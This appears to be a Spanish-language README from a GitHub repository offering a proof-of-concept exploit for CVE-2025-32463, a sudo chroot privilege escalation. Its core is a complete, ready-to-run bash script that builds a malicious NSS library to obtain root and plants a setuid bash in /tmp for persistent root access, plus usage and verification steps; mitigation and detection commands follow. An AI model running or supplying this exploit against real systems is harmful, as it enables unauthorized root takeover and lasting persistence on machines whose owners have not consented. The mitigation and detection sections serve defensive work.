
Exploit de escalada de privilegios local para CVE-2025-32463 que apunta al fallo de diseño de chroot en sudo. Proporciona un script de PoC, análisis técnico y orientación de mitigación para las versiones de sudo afectadas 1.9.14-1.9.17.
CVE-2025-32463 es una vulnerabilidad crítica de escalada local de privilegios en las versiones de sudo 1.9.14 a 1.9.17. Esta vulnerabilidad permite a los atacantes con privilegios de sudo escalar al acceso root explotando un defecto de diseño en la lógica de procesamiento de la opción chroot.
La vulnerabilidad se produce debido a un problema de temporización en el proceso de validación de seguridad de sudo. La función pivot_root se ejecuta antes de la verificación de la política de seguridad, lo que permite a los atacantes manipular el entorno del sistema de archivos que sudo utiliza para la autenticación y autorización.
nsswitch.conf maliciosopivot_root: Ejecutada demasiado pronto en el procesoset_cmnd_path: Opera en el entorno manipuladocommand_matches: Comprobaciones de seguridad omitidas debido a la manipulación del entornoAntes de usar este exploit, asegúrese de que se cumplan las siguientes condiciones:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
Compruebe si el sistema objetivo es vulnerable:
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
El script principal del exploit (cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
Después de una explotación exitosa, verifique el acceso root:
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
Actualice sudo a la versión 1.9.17p1 o posterior:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
Elimine las directivas chroot de sudoers (solución temporal):
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
Supervise los intentos de explotación:
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
La vulnerabilidad se debe a un defecto de diseño en el flujo de ejecución de sudo:
Flujo Normal Esperado:
Flujo Real Vulnerable:
El exploit aprovecha el sistema Name Service Switch (NSS):
/etc/nsswitch.conf para la autenticación de usuariosEste exploit ha sido probado en:
⚠️ AVISO IMPORTANTE ⚠️
Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.
¡Las contribuciones son bienvenidas! Por favor:
Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.
Nota: Esta vulnerabilidad afecta a un componente crítico del sistema. Úsela de forma responsable y asegúrese de que todas las pruebas estén autorizadas.